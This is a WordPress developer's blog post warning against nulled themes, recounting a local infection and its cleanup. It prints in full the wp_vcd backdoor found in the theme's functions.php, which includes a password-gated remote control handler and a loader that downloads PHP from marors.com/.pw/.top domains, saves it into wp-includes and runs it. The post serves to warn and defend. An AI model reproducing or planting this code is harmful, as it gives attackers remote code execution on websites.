Why I Will Never Use Pirated/Nulled WordPress Themes or Plugins Again

Say NO to nulled WordPress themes and plugins

Avoid Nulled WordPress Themes

– Hi, Can you give me the link to download “X” Theme? I can’t seem to find that online.

Every once in a while, I get calls like this. Since I am a WordPress developer and I design WordPress websites for my clients, I often get calls like this. Clients ask me to install a nulled/pirated WordPress theme.

A few years ago, I used to explain to my clients that using free WordPress themes is a better idea for their business, but they emphasized using nulled WordPress theme. They even gave me the nulled WordPress themes to start developing the website. I did not have any complaints. If the client does not care about his WordPress security, why should I? I am just a developer, right? WRONG!

What Happened When I Used a Nulled WordPress Theme

I had one of my biggest nightmares when I used a nulled WordPress theme. I wanted to test a premium WordPress theme before buying it. So I quickly did a Google search, and in a few minutes, I had a working copy of the premium theme in my localhost.

After some testing, I noticed that popups were opening now and then while navigating the website. The problem did not stop when I switched back to the default theme. I installed the Query Monitor to track what was going wrong. I found that the plugin was showing a warning.

QueryMonitor

I had previously worked with the Twenty Seventeen (The default WordPress theme) for months. I had no issue. After I switched back testing the nulled version of that premium WordPress theme, the error did not solve. (Maybe the error was also there when I was testing the theme, but I was so invested in testing, I never noticed! 🤦‍♂️ )

I immediately opened the functions.phpfile. In my previous experience, I saw most of the malicious codes are injected into functions.php file. I opened another functions.php file of Twenty Seventeen, downloaded fresh from WordPress.org repository. I compared the two functions.php files side by side.

It didn’t take me much time. I found there was an extra block of code in the modified functions.phpfile.

The extra malicious code looked like this

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '35c977caf96f9197995d4b4d3e14f253')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
    case 'change_domain';
    if (isset($_REQUEST['newdomain'])) {
        if (!empty($_REQUEST['newdomain'])) {
            if ($file = @file_get_contents(__FILE__)) {
                if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                    $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                    @file_put_contents(__FILE__, $file);
                    print "true";
                }
            }
        }
    }
 
    break;
 
case 'change_code';
 
if (isset($_REQUEST['newcode'])) {
    if (!empty($_REQUEST['newcode'])) {
        if ($file = @file_get_contents(__FILE__)) {
            if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']) , $file);
                @file_put_contents(__FILE__, $file);
                print "true";
            }
        }
    }
}
 
break;
 
default:
    print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
 
die("");
}
 
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
 
if (!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
 
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir() , "theme_temp_setup");
            $handle = fopen($tmpfname, "w+");
            if (fwrite($handle, "<?php\n" . $phpCode)) {
            }
            else {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
            }
 
            fclose($handle);
            include $tmpfname;
 
            unlink($tmpfname);
            return get_defined_vars();
        }
 
        $wp_auth_key = '358d76c863c31b2e1a46192808b08590';
        if (($tmpcontent = @file_get_contents("http://www.marors.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.marors.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        }
        elseif ($tmpcontent = @file_get_contents("http://www.marors.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        }
        elseif ($tmpcontent = @file_get_contents("http://www.marors.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        }
        elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
        elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
        elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}
 
// $start_wp_theme_tmp
// wp_tmp
// $end_wp_theme_tmp
 
?>

What Harm Can This Malicious Code Do?

If you look at this code, you can find out that the attacker can push whatever code he wants to your server. The PHP function makes use of curl which can be used to download any code/file as the attacker wants.

I was lucky that I installed the theme on my localhost using WAMP. The astonishing fact is that when I installed a brand new theme using the WordPress repository, the new theme had the safe exact code.

The malicious code was infecting every theme I was downloading to my WordPress installation. It happened to EVERY WordPress theme I tried in that installation. Every functions.php got infected with this malicious code in each time.

Then I removed the malicious code from allfunctions.php in my wp-content directory, hoping to fix this malicious injection. However, when I reloaded, Query Monitor was still reporting the same error. I was puzzled! How can the code appear again which I just fixed? 

Finding How Malicious Codes Replicate

I figured out that the theme didn’t just have malicious code in all of myfunctions.php. It did something else. I had to check the WordPress core files. However, before checking the core files, I added the following tag to wp-config.phplocated at the root.

define( 'DISALLOW_FILE_EDIT', true);

This will block all changes coming from the frontend. (Thanks to this nifty WordPress Security Guide!)

 Making Use of WP-CLI

Did you that wp-cli can do some awesome job like checking checksum or backing up a database? I used WP-CLI to check the core files.

Checksum Error

I found out that the plugin has modified 1 WordPress core file which is wp-includes/post.php.The malicious code also created two new files inside the wp-includesdirectory which are wp-vcd.php and wp-tmp.php

After a quick Google search, I knew that the most dangerous one is the filewp-vcd.php. The complete code looks like this

In short, the theme function was looking for a wp-vcd.php file inside thewp-includes folder. Then the core wp-includes/post.php file was modified to load the wp-vcd.php if exists.wp-vcd.php is the most dangerous malicious code which kept downloading codes from external server and kept replacing my all of my functions.php files.

Fixing wp-vcd.php Virus | Fix Auto Redirection and Popups in WordPress

When I discovered why my site was acting crazy, fixing the infected site was not very hard.

  • First of all, I added the define( 'DISALLOW_FILE_EDIT', true); to my wp-config.php
  • I removed everything from my wp-content/themes (you can go one step ahead and replace everything except your wp-content/uploads folder). Downloaded a fresh copy of WordPress from WordPress.org
  • Replaced the wp-content/themes folder from the freshly downloaded copy of WordPress.
  • Removed the whole wp-includes folder and replaced everything from the freshly downloaded copy of WordPress.

I will add some more reasons to avoid using nulled WordPress themes to justify my decision.

Nulled WordPress Themes Do Not Ensure Proper Security

As I showed you, you now know how one nulled theme can wreak havoc on your site. Your website can be a victim of data thefts, spamming, XSS Cross Site Scripting, or social engineering.

You should always make sure you follow proper WordPress security. The malicious code can spread across different files, which happened in our case. This makes it very hard to detect and fix viruses and malicious codes.

You could also lose your site data in the hack process. Last but not least, your site may get de-indexed from search engines for distributing malware.

Nulled WordPress Themes Do Not Respect Your Privacy

Usually nulled or pirated WordPress themes and plugins have malicious code hidden inside. These malicious codes can steal important information and data from your WordPress site and then makes them publicly accessible.

Compromised information can include your username, email address, and passwords, credit card info and more. If you run an online store or multi-vendor marketplace, then the risks are even great. You can check our specific guide on eCommerce safety to better secure your online stores.

Avoid Nulled Themes to Save Your SEO

It is no secret that Google loves websites that offer a great user experience. Using a nulled theme or plugin can generate an excessive amount of spam.

Why I Will Never Use Pirated/Nulled WordPress Themes or Plugins Again 1

Also, if Google finds out that your site is hosting malware, they will block your website with a warning page.

Nulled WordPress themes and plugins usually add spammy links to your website in a hidden way. These activities are hard to detect by human eyes as the links are well hidden in the code. You will see symptoms like getting frequently logged out, randomly redirected, seeing pop-ups and more.

Google is heavily invested in safe browsing. Google will notice this abnormal behavior of your website. Google can penalize your site in different ways including dropping your search rankings or de-indexing your website completely.

No Access to Documentation and Updates

When you buy a new theme or plugin, you do not merely buy the product itself. You also buy years of updates, manual, documentation of those plugins and themes. Knowing how your system work can have a positive impact on your pagespeed.

If you are using a nulled/pirated theme, you will not have access to the product’s documentation. Hence, you cannot configure the plugin or theme efficiently. You may have to go with a trial and error that can waste many hours of your life. If you had access to the documentation, you could configure them without losing many hours.

Make Use of Free Alternatives

There are more than 40000 plugins in the WordPress repository. Whatever your needs are, chances are there is more than one plugin. You can always search for a free alternative in the WordPress repo.

We picked up some of the best WordPress plugins, most of them were free. We found the fastest social sharing plugin is completely free and open source. There are thousands of great free themes too.  There are free SEO Friendly WordPress themes to get an extra boost in search engine rankings. There are some great free business themes too.

When there are so many options, is there any need for using nulled theme/plugin? I don’t think so!

Concluding Thoughts

Whenever I have look deeper into a nulled theme or plugin, it has always had a backdoor added to one of the files.

If you know PHP well enough, you can spot and remove these backdoor. Most people new to WordPress do not have that many skills, and they fall victim of data breach/hacked websites. Follow our comprehensive 31+ WordPress Security Tips to strengthen your website’s security.

In case your website is compromised, you can lockdown WordPress in case of an emergency.

Leave a Reply